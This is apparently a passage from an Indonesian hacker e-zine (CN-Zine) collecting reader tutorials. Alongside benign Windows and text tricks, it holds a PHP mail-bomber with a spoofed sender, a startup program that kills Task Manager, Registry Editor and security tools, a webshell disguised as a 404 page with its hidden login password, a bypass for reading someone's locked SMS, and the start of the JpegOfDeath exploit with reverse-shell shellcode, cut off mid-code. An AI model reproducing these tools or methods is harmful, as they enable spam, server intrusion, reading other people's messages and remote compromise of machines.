Metode ini akan merestriksi Aplikasi/Program dengan membaca nama file, misalnya pada contoh ini : Anti Avira.exe Pembaca boleh mencoba merestriksi Aplikasi/Program lainnya, hanya dengan memanfaatkan nama filenya, misal : winamp.exe, firefox.exe, regedit.exe, cmd.exe dan lain sebagainya. Silahkan Pembaca buka Registry Editor.

Kemudian masuk ke HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options (Seperti pada gambar di atas).

26

Klik kanan pada Image File Execution Options, pilih New, dan pilih Key.

Ubah New Key #1 menjadi nama file dari Aplikasi/Program yang ingin direstriksi, misalnya Penulis memasukkan Anti Avira.exe

Kemudian klik kanan pada nama file (Anti Avira.exe) pilih New dan pilih String Value.

27

Ubah New Value #1 menjadi debugger.

Kemudian klik kanan pada debugger dan pilih Modify, dan pada Value Data masukkan : rundll32 user32.dll,MessageBeep .Jalankan filenya, dalam contoh ini (Anti Avira.exe), pasti tidak akan muncul apapun. Silahkan dicoba untuk nama file lain  2.Restriksi Aplikasi/Program tertentu dengan menggunakan Registry Editor Buka kembali Registry Editornya.

28

Masuk ke : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer (Seperti pada gmbar di atas). Buat sebuah DWORD Value dan masukkan DisallowRun (Jika belum ada) dengan cara sebagai berikut :

Klik kanan pada Explorer, kemudian pilih New, pilih DWORD Value.

Ubah New Value #1 menjadi DisallowRun.

Kemudian klik kanan pada DisallowRun dan pilih Modify, dan pada Value Data masukkan 1.

29

Klik kanan pada Explorer, pilih New dan pilih Key.

Ubah New Key #1 menjadi DisallowRun

Klik kanan pada DisallowRun, pilih New dan pilih String Value.

Ubah New Value #1 menjadi nama file dari Aplikasi/Program yang ingin di restriksi, pada contoh ini misalnya : Anti Avira.exe

30

Klik kanan pada Anti Avira.exe dan pilih Modify, dan pada Value Data masukkan Anti Avira.exe juga. LogOff Windowsnya dan LogOn kembali, setelah itu barulah jalankan filenya dalam contoh ini (Anti Avira.exe), pasti akan muncul sebuah message box yang menyatakan bahwa file tersebut tidak boleh dijalankan/dieksekusi. Silahkan dicoba untuk nama file lain 

3.Restriksi Aplikasi/Program tertentu dengan menggunakan Program C++ Metode pertama dan kedua memiliki kelemahan yaitu Jika nama filenya diganti menjadi sembarang, maka Aplikasi/Program yang direstriksi dapat dieksekusi kembali. Metode ke-tiga ini bisa juga digunakan untuk merestriksi beberapa Program/Software/Aplikasi tertentu. Dengan memanfaatkan Caption dari Program/Aplikasi, maka kita dapat membuat sebuah Program yang menterminate Aplikasi/Program yang memiliki Caption tertentu. Yang kita perlukan sekarang adalah sebuah Program dengan nama Hook Spy, Hook Spy ini berada dalam 1 paket aplikasi Net Tools. Anggap saja Pembaca sudah mendownload Hook Spy, sekarang tinggal menjalankannya. Sebelum menjalankan Pembaca harus mengatur Compatibility dari Program Hook Spy. Caranya adalah dengan mengklik kanan Properties file Hook Spy.exe (File ini berada di direktori installasi Net Tools). Atur seperti pada gambar di bawah.

31

Sekarang anggap saja kita akan merestriksi aplikasi Mozilla Firefox. Buka Mozilla Firefox dan Hook Spy, kemudian drag

ke Title Bar Mozilla Firefox (Seperti pada gambar di bawah ini).

Perhatikan yang dilingkar merah, itu adalah tempat Pembaca mendrag Pointer Hook Spy untuk mendapatkan Caption dari Mozilla Firefox. Perhatikan yang dilingkar biru, itu adalah Caption dari Mozilla Firefox. Silahkan Pembaca coba-coba sendiri untuk mendapatkan Caption dari Aplikasi/Program lainnya  Oke… Setelah kita dapatkan Captionnya, sekarang kita buat program C++ nya. Program C++ yang Penulis buat ini, sudah disertakan beberapa Caption dari Program/Aplikasi yang biasa terdapat di Windows. #include #include <stdio.h>

32

#include <windows.h> #include <stdlib.h> #include #include using namespace std; void blocker(); int main(int argc, char* argv[]) { FreeConsole(); blocker(); return 0; } void blocker() { int i = 0; HWND hWin; HWND taskbar,start; HWND Window; HWND hWind; HMODULE GetModH = GetModuleHandle(0); char path[MAX_PATH]; GetModuleFileName(GetModH, path, 256); while(i<100) { hWin = FindWindow(NULL,"Windows Task Manager"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);

33

hWin = FindWindow(NULL,"Registry Editor"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); hWin = FindWindow(NULL,"C:\\WINDOWS\\system32\\cmd.exe"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); hWin = FindWindow(NULL,"Mozilla Firefox"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); hWin = FindWindow(NULL,"Speed Dial - Opera"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); hWin = FindWindow(NULL,"New Tab - Google Chrome"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); hWin = FindWindow(NULL,"Untitled - WinArpAttacker 3.5 2006.6.4"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); hWin = FindWindow(NULL,"Folder Options"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); hWin = FindWindow(NULL,"SmartSniff"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); hWin = FindWindow(NULL,"PuTTY Configuration"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); hWin = FindWindow(NULL,"Internet Download Manager 5.18"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); hWin = FindWindow(NULL,"Havij"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); hWin = FindWindow(NULL,"The Wireshark Network Analyzer"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); hWin = FindWindow(NULL,"Run"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);

34

Copy paste script di atas modifikasi sesuai kebutuhan Pembaca, tulisan yang dicetak biru adalah Caption dari Aplikasi/Software/Program tertentu. Compile-lah menggunakan Dev-C++ versi terbaru Setelah di Compile, silahkan di jalankan Program tersebut dan dijadikan Start Up melalui registry, lalu Pembaca coba jalankan Aplikasi Mozilla Firefox, Google Chrome, Opera, Registry Editor. Pasti Aplikasi-aplikasi tersebut akan langsung tertutup! Kelemahan dari metode ini adalah tidak semua Aplikasi/Program memiliki Caption dan kadang kala ada Aplikasi/Program yang Captionnya sulit untuk didapatkan. 4.Restriksi Aplikasi/Program tertentu dengan menggunakan Security Policies (secpol.msc) Metode terakhir yang akan Penulis paparkan adalah merestriksi Program/Aplikasi tertentu dengan menggunakan fitur bawaan Windows, yaitu : Security Policies. Metode restriksi ini dinilai ampuh dibandingkan beberapa metode sebelumnya. Sekarang Penulis akan mencoba merestriksi sebuah Keylogger yang telah terinstall sebelumnya di PC milik Penulis

Silahkan Pembaca buka Run, dan ketikkan secpol.msc kemudian tekan enter. Maka akan muncul Program seperti di bawah ini :

35

Klik ganda Software Restriction Policies dan Klik kanan pada Additional Rules dan pilih New Hash Rule. Maka akan muncul sebuah Pop-up seperti di bawah ini :

Klik Browse dan masukkan file Aplikasi/Program yang ingin direstriksi, sebagai contoh Penulis memasukkan Program Keylogger yang sudah dijelaskan di atas. Dan mendapati hasil seperti di bawah ini :

36

Selanjutnya tinggal kita Klik Apply dan OK. Setelah itu Aplikasi/Program yang kita restriksi tadi akan terdaftar sebagai Aplikasi/Program yang terestriksi, seperti pada gambar di bawah ini :

Setelah terdaftar, silahkan Pembaca melakukan LogOff dan LogOn kembali. Cobalah untuk menjalankan Aplikasi/Program yang telah didaftarkan untuk direstriksi. Pastinya Aplikasi/Program tersebut tidak dapat dieksekusi dan muncul Message Box seperti ini :

Untuk menghapus dari Daftar Aplikasi/Program yang direstriksi, tinggal kita pilih saja dan tekan tombol delete pada keyboard, maka Aplikasi/Program tersebut dapat dieksekusi kembali. Sebagai tambahan, Metode terakhir ini memang ampuh sekalipun nama File Aplikasi/Program dirubah, Metode ini akan tetap berjalan mulus jika dibandingkan dengan metode yang pertama dan kedua.

PENUTUP : Setelah kita mengetahui beberapa metode dalam merestriksi Aplikasi/Program tertentu, kita selaku pihak pemegang otoritas (Administrator, Operator, IT Departement) diharapkan dapat melakukan pengaturan restriksi terhadap Aplikasi/Program tertentu di tempat yang kita kelolai, untuk menghindari dan mereduksi ancaman kejahatan komputer. Sebagai seorang pemegang otoritas sebaiknya kita selalu up to date dan menghindarkan diri dari kegaptekan, karena setiap hari bermunculan program-program jahat yang siap menenggelamkan Windows yang kita pakai. Bagaimana caranya agar kita selalu up to date terhadap perkembangan dunia maya?

37

Gampang… Bergabunglah ke forum-forum diskusi, seperti : Codenesia. Akhir kata “Tak ada gading yang tak retak”. Penulis mohon maaf jika ada kesalahan dalam Penulisan artikel ini.

BIOGRAFI PENULIS : Dwi atau Kali Cisadane (X-Cisadane), setelah menamatkan pendidikan Sekolah Menengah Atas, kemudian melanjutkan pendidikannya di Perguruan Tinggi Swasta jurusan Sistem Informasi di Universitas Gunadarma Depok, Indonesia. Sebagian besar, ilmu yang dimilikinya di dapat dari dunia maya dan dari penelitiannya yang secara otodidak. Penulis juga aktif dalam beberapa Forum Diskusi yang membahas Dunia Underground seperti : XCode, BorneoCrew, DepokCyber, Cisadane Hacker Community, Muslim Hackers, Dunia Santai dan yang lainnya. Contact : [email protected]

38

Membuat Page untuk Anonymous Email & Mail Boomber By: anharku a.k.a r13y5h4 “Semua yang ada dalam artikel ini hanya untuk pembelajaran semata, penulis tidak bertanggungjawab atas tindakan saudara setelah membaca artikel ini” Spam? Apa itu? Mungkin netter seperti kalian banyak yang sudah tahu arti SPAM. Ya..Spam adalah e-mail sampah, yang biasanya berisi sesuatu yang tidak penting, iklan, pemberitahuan, dan biasanya e-mail SPAM tersebut jumlahnya banyak dan selalu membanjiri INBOX e-mail kita. Kali ini saya akan mengajak anda jalan2 ke kota naik delman istimewa… loh kok malah nyanyi :p, kali ini saya akan mengajak anda membuat halaman/ page website yang berguna untuk mengirimkan e-mail anonymous (e-mail dengan alamat pengirim palsu) dan juga e-mail bomber ( membanjiri e-mail target dengan SPAM). Mohon jangan disalahgunakan yah…Nih Scriptnya: Anonymous Emailer/Mail Bomber

Pengirim

Nama:

Alamat Email:

Alamat Balas Email:

Penerima

Email Penerima:

Judul:

39

Pesan:

Berapa Kali E-mail dikirim

\n"; $header .= "Reply-To:$email_return\n"; $message2 = stripcslashes($message); for($x=1;$x<$messages+1;$x++){ mail($target,$subject,$message2,$header); } ?>

Simpan dengan nama MailBoomber.php Penjelasan code: for($x=1;$x<$messages+1;$x++){

Script diatas digunakan untuk jumlah e-mail yang akan dikirim mail($target,$subject,$message2,$header);

Script diatas digunakan untuk mengirimkan e-mail dengan isi pesan sesuai $message2 Yang harus dilakukan pertama2 adalah membaca do’a, dan MELANGKAH PAKAI KAKI KANAN HHHHH… ketahuan kebanyakan nonton TV ne :p , yang pertama dilakukan ya Upload dulu ke server misal: http://s-m.no/MailBoomber.php

40

lalu panggil / buka dari browser

Isi data2 Pengirim Nama: Pakai nama palsu juga boleh Alamat E-mail: Usahakan Alamat E-mail Yahoo ,biar bener2 ke kirim :p Alamat Balas Email: Nah ini nih yg di isi dengan anonymous Email disini saya contohkan alamat pengirimnya [email protected] (sebenarnya email tersebut tidak ada/hanya alamat e-mail palsu saja) Isi semua.. Penerima, E-mail Penerima (Target), judul, isi (SPAM) dan Jumlah E-mail yg akan dikirim (misal : 5) Terus tekan tombol SUBMIT untuk mengirimkan e-mail tersebut.

41

Untuk melihat pakah script tersebut berjalan atau tidak coba kirim ke e-mail kamu sendiri, Lalu buka email kamu

Nah..udah deh ketahuan kalo ada e-mail SPAM dari anharku :p , coba lihat isinya?? Perhatikan bagian ini

42

Ketika akan membalas e-mail alamat yg tertera adalah alamat anonymous seperti yang telah kita setting pada bagian awal tadi yaitu [email protected]

Sekian aja ya artikel tentang SPAM dan ANONYMOUS E-MAIL dari saya… akhir kata “ Jangan Menjadi SAMPAH, kalo di Dunia Maya saja sudah jadi SAMPAH bagaimana di dunia NYATA??? Tulislah sesuatu yang bermanfaat  ” Thanks to: Member Codenesia, YF/ X-CODE, IDC, IH, HN, DC and INDONESIANDEFACER

By: anharku a.k.a r13y5h4 http://codenesia.com caci maki ke [email protected]

Sumber: http://www.mmowned.com/forums/world-of-warcraft/general/scam-prevention/81786-phpanonymous-emailer-mail-bomber-script.html

43

Recode Webshell by oRb to 404 Not Found by : c0d3HitLER Terinspiracy dari CN-Zine edisi 6 yang terbit pada Bulan Oktober 2011, disana ada artikel berjudul “JUMPING dengan SHELL SPECIAL” dari anharku. Saya sendiri belajar webhacking pada awal Bulan Januari 2011. Sebelum membaca artikel tersebut, saya selalu berganti-ganti webshell ketika hendak memulai aktivitas hacking di dunia maya. Beberapa webshell yang pernah saya coba yaitu : 1. C99.php 2. Antichat.php 3. R75.php 4. B374K.php 5. Safe0ver.php 6. Dan Syrian Shell v.3 dari hacker asal Syria Kesemuanya saya dapat dari beberapa blog yang memandu saya untuk belajar webhacking. Iseng membaca kembali satu persatu CN-Zine dari edisi awal hingga edisi 8 saya menemukan sesuatu yang menarik seperti pada paragraph pertama artikel ini. Saya lantas mencoba untuk mencari webshell tersebut dan alhasil… Tidak ketemu  Saya tidak menyerah, seseorang dari HNc (hacker-newbie.org) yang namanya kalau tidak salah alecs menshare sebuah webshell yang mirip dengan webshell WHT kepunyaan mas anhar. Saya teliti isinya dan saya coba search di google ternyata bernama webshell by oRb atau lebih akrab dengan WSO (sampai sekarang mencapai versi 2). Tidak benar-benar mirip memang, tapi sepertinya dapat menjadi awalan yang bagus untuk saya. Webshell ini tergolong mudah untuk dikembangkan termasuk untuk seseorang yang awam dalam hal pemrograman seperti saya. Tak patah arah, saya mencoba untuk mengembangkan webshell WSO tersebut semirip mungkin dengan webshell WHT dari mas anhar. Mungkin sudah menjadi keberuntungan bagi saya karena dalam bulan April ini saya sudah mendapat semua bahan yang dimaksud dalam CN-Zine 6. Special shell dari om

44

kamtiez saya dapat dari situs resmi sebuah sekolah menengah atas di Malang dan isinya sama persis. Scanner saya dapat lagi dari HNc ketika membahas shell khusus jumping. Kesemuanya tinggal dipermak sedikit demi sedikit hingga kini menjadi sedikit mirip :D. Saya menamakannya 404 Not Found, filenya sendiri bernama error.php. Bagi yang membutuhkan webshell tersebut saya akan membagikannya cuma-cuma kepada teman-teman sekalian sekaligus memberikan sedikit kelebihannya bila dibandingkan versi aslinya. 404 Not Found 1.

Fake page error 404 :

Sekilas tidak terlihat bahwa screenshoot diatas adalah sebuah webshell, ya hanya sebuah page error 404 yang memberitahukan bahwa file yang dicari tidak terdapat pada server. Kalaupun dilihat sourcenya hanya akan terlihat seperti :

45

Lagi-lagi hanya page error 404 Sekarang kita akses dengan menambahkan parameter “?login” tanpa tanda petik

Apa bedanya dengan gambar serupa sebelum ini? Ya, sekilas masih sama. Perbedaan baru akan terlihat bila kita melihat sourcenya

46

Taraa.. lihat bedanya, disana akan terlihat form isian password. Lalu kalau ada form isian password, dimana kita bias menginputkan passwordnya? Kembali ke halaman utama, silakan muter-muter di bawah tulisan A pada Apache “Apache Server at localhost on Port 80” Tunggu,,, stop disana, ya disana. Hey dibilangin jangan kemana-mana kog!!! Mouse Anda akan terlihat berkedip disana, jangan banyak cincong klik aja lalu ketik “leaveitblank” tanpa tanda

petik.

Darimana

asal

leaveitblank,

asalnya

dari

$auth_pass

=

"b1eb36adf3d4557cf5003caff9d49728"; Keterangan : $auth_pass adalah variablenya dan b1eb36adf3d4557cf5003caff9d49728 adalah md5 dari leaveitblank Udah tahu kan? Saya mencoba membuat agar webshell ini seaman mungkin dari pemilik situs dan dari mafia backdoor.

47

Oke lanjut setelah mengetikkan leaveitblank maka tekan ENTER dan lihat hasilnya

Taraa… pinter deh :D Sekarang kita sudah berada dalam halaman utama webshell. Terserah Anda mau apakan isi dari webserver tersebut. 2.

Tampilan yang komunikatif

Saya membuat tampilan menjadi lebih mudah diingat, cocok untuk pemula yang baru belajar. Dibuat juga pembeda warna antara directory yang writable dan not writable Writable (dapat ditulisi) ditandai dengan warna biru, bila Anda menemukan directory berwarna biru maka positif untuk Anda dapat mengupload file maupun mengobark-abrik isinya. Not Writable (Tidak Dapat Ditulisi) ditandai dengan warna merah. Kemungkinan besar Anda tidak akan dapat melakukan apa-apa dengannya.

48

3.

Penambahan fungsi jump scanner

Dengan ini maka Anda akan mendapatkan kelemahan dari webserver, jika beruntung Anda dapat melihat directory yang dapat ditulisi (writable). 4.

Fungsi logout dan suicide (hapus webshell) yang lebih baik dari sebelumnya

Setelah Anda klik logout maupun suicide maka Anda akan ter-redirect secara otomatis dalam tiga detik. Bila Anda klik logout Anda akan dialihkan menuju halaman utama webshell sebelum login seperti pada gambar pertama. Namun bila Anda klik suicide, maka webshell ini akan terhapus secara otomatis dan Anda akan diarahkan menuju halaman utama website. 5.

Special webshell for jumping (linux only)

Seperti kata mas anhar, shell ini merupakan pemberian dari om kamtiez. Digunakan untuk jumping dari satu website ke website yang lain dalam satu virtualhost. Hanya dapat bekerja pada linux, tidak pada windows. Karena belum sempurna maka shell ini saya taruh pada halaman paling bawah dari webshell 404 Not Found.

49

Bobol Dekstop Locker By: Ridho

Assalamu alaikum, Salam Sejahtera Untuk Kita Semua,,, Sebenarnya saya ini cuma newbie cupu, tapi karena saya ingin berbagi ilmu dengan para sahabat saya disana yaa sudah saya paksakan menulis sedikit demi sedikit tutorial,,, Okey, kelamaan basa basi nanti malah jadi basi, hahaha,..Step By Stepnya. Ketika Desktop sudah terkunci seperti ini:

1. Kawan-kawan tekan tombol “Windows+R” 2. lalu masukan “taskkill /f /im "desktop locker.exe"” Oiya, yg ini bayang-bayang loh, karena tampilanya tertutup Desktop Locker tersebut. “Windows+R”

= membuka baru applikasi

taskkill

= perintah/aplikasi untuk menutup aplikasi

/f /im

=Force/Paksa = image name/lebih jelasnya nama aplikasi itu

50

Taraaaaaaaaaa,,, Desktop Locker udah kaga ada di Komputer target. Loh,, Loh,, Loh,, Kalo Taskbarnya hilang, jangan panik dlu yaa, 3. Tekan tombol “Ctrl+Alt+Del” Penjelasan

: “Ctrl+Alt+Del” = Task manager

Hingga keluar gambar disamping. 4. Tinggal matikan explorer yang sedang berjalan # klik explorer.exe # klik End Process -> Ok # Klik File # Klik New Task (Run)

51

Hingga keluar seperti ini:

5. Ketik “explorer.exe” lalo klik “Ok”. Nah sudah selesai deh pekerjaan kita,,,

Thank’z to : Codenesia - XCode - HNc – Devilzc0de – dll

By: Ridho Kian Islami Visit : http://www.dhocy.blogspot.com/

52

Sebuah Tulisan dengan Character Map by : VirSpector Halo semuanya! Saya VirSpector, siap untuk berbagi di CN-Zine ke 9! Hmm… lagi laper nih bagi-bagi ilmu, mengingat ada ilmu baru    (Hehehe…) Ok, siapa sih yang gak tau cara Underline atau Coret suatu tulisan pada Microsoft Word dkk? Semua pasti bisa kan? Nah, coba anda copy-paste tuh tulisan misalnya ke Facebook. Mau gak dia berfungsi? Kagak mau toh? Hehehe… Tapi bisa lho sebenarnya dengan bantuan Character Map… Bahkan, bukan sekedar Underline maupun Coret aja, tapi juga bisa seperti ini. Wuuuiihhh… Gimana caranya tuh    (Sok kaget)… Ok, sesuai judulnya, Menggunakan Character Map maka kita buka dulu program Character Map bawaan Mikocok… eh… Microsoft Windows kita  (Pada Windows Vista dan 7)  Tekan logo Windows ketik Character Map lalu tekan ENTER (Pada Semua Windows) Klik Start – All Programs – Accessories – System Tools – Character Map Ok, kita sudah mendarat di Character Map.

53

Sekarang, beri tanda centang pada check box Advanced View sehingga akan terlihat detail dari character yang kita pilih…

Lalu ketikkan 0300 pada bagian Go To Unicode lalu tekan ENTER

Sekarang anda sudah dibawa ke Unicode nomor 300 ke atas. Nah, semua Unicode dari nomor 300 hingga 362 bisa anda pakai untuk mengvariasikan tulisan anda. Caranya: 1. Dobel Klik pada Karakter Yang Diinginkan. Ingat! Perhatikan, apakah karakter tersebut saat diklik dia posisinya ada di tengah kotak atau agak kekanan.

54

2. 3. 4.

5.

Pada gambar di kiri, karakter tersebut ada di tengah kotak sementara yang di kanan karakter tersebut ada di kanan kotak Setelah karakternya muncul di text box Characters to copy, klik tombol “Copy” Buka Notepad (Cara Cepat: Tekan Logo Windows + R pada Keyboard lalu ketik notepad.exe lalu ENTER) Sekarang, harus kita ingat-ingat lagi yang nomor 1. Apakah karakternya ada di tengah kotak atau agak kekanan. Oh iya, sebelum lupa, ingat! Kita akan mempernak-pernik sebuah karakter, bukan sebuah kata atau kalimat. Jadi misalnya punya satu kalimat/kata, harus dipernak-pernik satu-persatu tiap karakter… Ok, jadi… Bila karakternya (Yang dari Character Map) tadi ada di tengah kotak, maka TULIS KARAKTER YANG INGIN ANDA PERNIK lalu Pastekan karakter yang kita Copy dari Character Map tadi… Sebaliknya, bila karakternya (Yang dari Character Map) agak kekanan, maka PASTE TERLEBIH DAHULU KARAKTER (Yang dari Character Map) lalu tulis karakter yang ingin anda pernik. Jadi deh! Silahkan ubah satu persatu!

Contoh-contoh: - LAGI-LAGI CONTOH Keren kan! Sekarang coba copy dan jadikan Status Update anda. Pasti mau! Ok, segitu aja tutorial dari saya, moga-moga ngerti soalnya agak susah ini dijelasin lewat tulisan. Lebih mudah klo Praktek. Mungkin ntar aku buatin videonya  Ok, segitu aja dulu… Sampai ketemu di artikel saya nanti (entah kapan) Visit: www.virspector.uk.to (My Blog. All the contents are 100% made by me, no Copas!) Visit: www.bluelizer.com (My Social Networking. The scripts are made 100% from scratch. No CMS!)

55

Easy Download Youtube By : Ezha Vangeance

Salam kenal kepada siapa aje yg baca tulisan ini .Ane disini mau berbagi ilmu dikit nih tentang cara donlod di youtube .Buat yang suka nonton youtube pasti tau dong cara donlod’a .Ada banyak software yg bisa digunakan untuk mendonlod di youtube .Tapi kali ini ane mau ngasih tau cara’a donlod tanpa harus pake software apapun ,jadi gak harus nunggu lama deh =) Peralatan dan cara’a udah banget ko ,kita cuma butuh IE (internet explorer) dan sedikit ketelitian aja .. Berikut ini adalah cara’a : 1 . Buka video yg ingin kamu donlod dan tunggu hingga selesai

Hehehehe …maap kalo video’a gituan coz ane suka snsd cii =)

56

2 .Kita pilih Tool >Internet Option –>lalu pilih setting

3 .Pilih View File

57

4 .Cari file yg ukuran kb’a paling besar ,karena itu adalah file video’a

Nah itu dia file’a yg ukuran’a 24mb .Setelah video’a ketemu tinggal copy lalu paste dimana saja .Terserah mau di my document atau folder lain .Tapi jangan lupa untuk menambahkan .flv pada nama file’a ,iki loh contoh’a :

Jika sudah begini ,tinggal tonton video’a deh pake player apa aja yg ada di komputer anda .Kalo ane mah pake gom player =) Oke cukup sekian aja yg bisa ane berikan ,semoga bermanfaat bagi yg membaca’a .Ane mohon maap bila artikel ini acak”an ,maklum lah masih newbie =) Thank to : – –

Allah SWT All member of Codenesia

By

: Ezha Vangeance

e-mail : [email protected]

58

Hack Aplikasi Handcent SMS Android By: anharku a.k.a r13y5h4 Aplikasi handcent sms yang akan kita hack kali ini adalah aplikasi handcent sms untuk hp android. Sampel yg saya gunakan disini hp saya sendiri yaitu hp samsung android galaxy mini (wuis bukan promosi hhhhh….)

Aplikasi handcent sms digunakan untuk memproteksi sms agar tidak dibaca orang lain. Apabila kita hendak membaca sms kita harus memasukkan password terlebih dahulu, karna sang pemilik hp telah mensetting password pada aplikasi handcent sms tersebut.

Lalu bagaimana kita bisa membaca sms sedang kita tidak tahu apa passwordnya??? Caranya mudah... 1. Masuk ke kontak

59

2. Pilih histori , Tekan saja pesan yg ingin dibaca 3. Pilih aksi ,Aksi kengkap memakai, Pilih aplikasi sms biasa / bawaannya (pesan).

4. Udah deh bisa kebaca semua sms yg masuk… 

Catatan: teknik hack ini hanya bisa digunakan untuk orang yg ceroboh lupa untuk menghapus histori atau log di hpnya. Dengan kata lain kita memBayPass aplikasi handcent sms dengan menggunakan jalur alternatif yaitu histori / log sms. Ada satu cara lagi untuk menjebol aplikasi handcent sms yaitu dengan meng-Kill proses / SERVICE aplikasi tersebut yaitu dengan menggunakan aplikasi taskmanager di android namanya Advance Task Killer ( https://market.android.com/details?id=com.rechild.advancedtaskkiller&feature=search_result ) setelah aplikasi handcent sms dimatikan SERVIS nya maka kita bisa masuk ke pesan tanpa menuliskan password hehehe :p Sekian saja artikel coepoe dari saya… akhir kata “ Hacking bukan hanya menjebol aplikasi tapi bisa juga memanfaatkan kecerobohan si TARGET ( Pepatah by SOCENG)….” Thanks to: Member Codenesia, YF/ X-CODE, IDC, IH, HN, DC and INDONESIANDEFACER By: anharku a.k.a r13y5h4 http://codenesia.com

60

EXPLOIT JPEG By: J0ck3r Thanks buat codenesia yang udah berkenan menampilkan artikel ane ini,maaf bila artikel yang ane tulis selama ini bahasanya agak ngawur dan gak beraturan alogarithma nya < halagh>.Pernah berkunjung ke beberapa situs yang menginformasikan adanya vulnerability pada website,application windows dan lain sebagainya??bila belum cobalah berkunjung ke beberapa situs semacam: 1. security focus 2. security reason 3. exploit-db dan lain sebagainya. Kita akan mendapati berbagai macam bugs yang tersedia disana,tentunya sangat berharga bagi kita sebagai awal langkah kegiatan hacking kita..he he he Cukup untuk basa-basi yang sangat basi diatas,disini ane Cuma mau memperlihatkan sebuah bugs buffer overflow yang mungkin sangat basi buat master-master sekalian semuanya,dan juga bugs ini udah ada patchnya,meskipun begitu masih bisa digunakan kok :p < asal korban belum melakukan patching lo yaa…>. Ok guys,siapkan dulu sebuah gambar apa aja, siapkan juga exploit JpegOfDeath.c lalu compile menjadi JpegOfDeath.exe Ni exploitnya: /*************************************************************** * ********************************************************************/

#include <stdio.h> #include <stdlib.h> #include <string.h>

61

#include <windows.h> #pragma comment(lib, "ws2_32.lib")

/* Exploit Data... */

char reverse_shellcode[] = "\xD9\xE1\xD9\x34" "\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80" "\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB" "\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC" "\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1" "\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF" "\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA" "\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8" "\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3" "\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3" "\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5" "\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF" "\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7" "\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54" "\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B" "\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3" "\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C" "\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7" "\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA" "\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19" "\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"

62

"\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19" "\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52" "\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";

